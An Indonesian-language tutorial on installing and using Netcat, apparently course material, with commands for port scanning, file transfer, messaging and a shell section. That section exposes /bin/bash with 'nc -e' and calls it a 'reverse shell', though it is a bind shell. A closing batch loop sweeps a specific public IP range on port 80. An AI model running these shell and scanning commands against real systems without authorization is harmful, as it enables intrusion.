## Netcat

### Tujuan

Materi ini bertujuan untuk memberikan pemahaman tentang penggunaan Netcat, alat serbaguna untuk mengelola koneksi jaringan. Peserta akan belajar tentang berbagai fitur Netcat, termasuk pemindaian port, transfer file, mendengarkan dan mengirim data, serta penggunaan lanjutan seperti reverse shell.

### Persyaratan

- Pengetahuan dasar tentang jaringan komputer dan protokol TCP/IP.
- Akses ke terminal atau command prompt di sistem operasi yang mendukung Netcat.

#### Instalasi di Windows

1. **Unduh Netcat**:
    
    - Netcat untuk Windows dapat diunduh dari berbagai sumber online. Salah satu tempat yang umum digunakan adalah situs web resmi Netcat di https://eternallybored.org/misc/netcat/.
    - Pilih versi Netcat yang sesuai dengan arsitektur komputer Anda (32-bit atau 64-bit).
    - Unduh arsip zip yang sesuai dan simpan di lokasi yang mudah diakses pada komputer Anda.
2. **Ekstrak File**:
    
    - Ekstrak arsip zip yang telah Anda unduh ke lokasi yang diinginkan pada komputer Anda.
3. **Tambahkan Path (opsional)**:
    
    - Untuk kemudahan penggunaan, Anda dapat menambahkan lokasi tempat Anda menyimpan Netcat ke dalam variabel lingkungan PATH di Windows.
    - Buka Control Panel > System and Security > System > Advanced system settings > Environment Variables.
    - Pilih variabel PATH pada bagian System Variables, lalu klik Edit.
    - Tambahkan path menuju direktori tempat Anda menyimpan Netcat (contoh: C:\netcat) dan klik OK.
4. **Verifikasi Instalasi**:
    
    - Buka Command Prompt (cmd).
    - Ketik `nc -h` atau `ncat -h` dan tekan Enter.
    - Jika instalasi berhasil, Anda akan melihat bantuan dan opsi untuk Netcat.

#### Instalasi di Linux (Debian)

1. **Instalasi dari Repositori :**
	- Buka terminal
	- Jalankan perintah berikut untuk instalasi `sudo apt update` dan `sudo apt install netcat`
	- Ketikkan kata sandi pengguna jika diminta, lalu tunggu hingga proses instalasi selesai.
2. **Verifikasi Instalasi :**
	- Setelah instalasi selesai, Anda dapat memverifikasi Netcat dengan menjalanakan perintah : `nc -h`
	- Jika instalasi berhasil, Anda akan melihat bantuan dan opsi untuk Netcat.


#### Scanning

##### Pemindaian Port

``` bash
nc -zv <target_host> <port_range>
```

##### Mendengarkan Port

``` bash
nc -lvp <port_number>
```

##### Mengirim File

``` bash
nc <target_host> <port_number> < file_to_send
```

##### Menerima File

``` bash
nc -lvp <port_number> > received_file
```

##### Mengirim Pesan

```bash
nc <target_host> <port_number>
```

##### Reverse Shell

Host attacker

``` bash
nc <target_host> <port_number>
```

Host target

``` bash
nc -lvp <port_number> -e /bin/bash
```

Iterates host Scanning
``` bash
for /l %%x in (1,1,100) do (
	nc64 -nvz 103.19.180.%%x 80
)

pause
```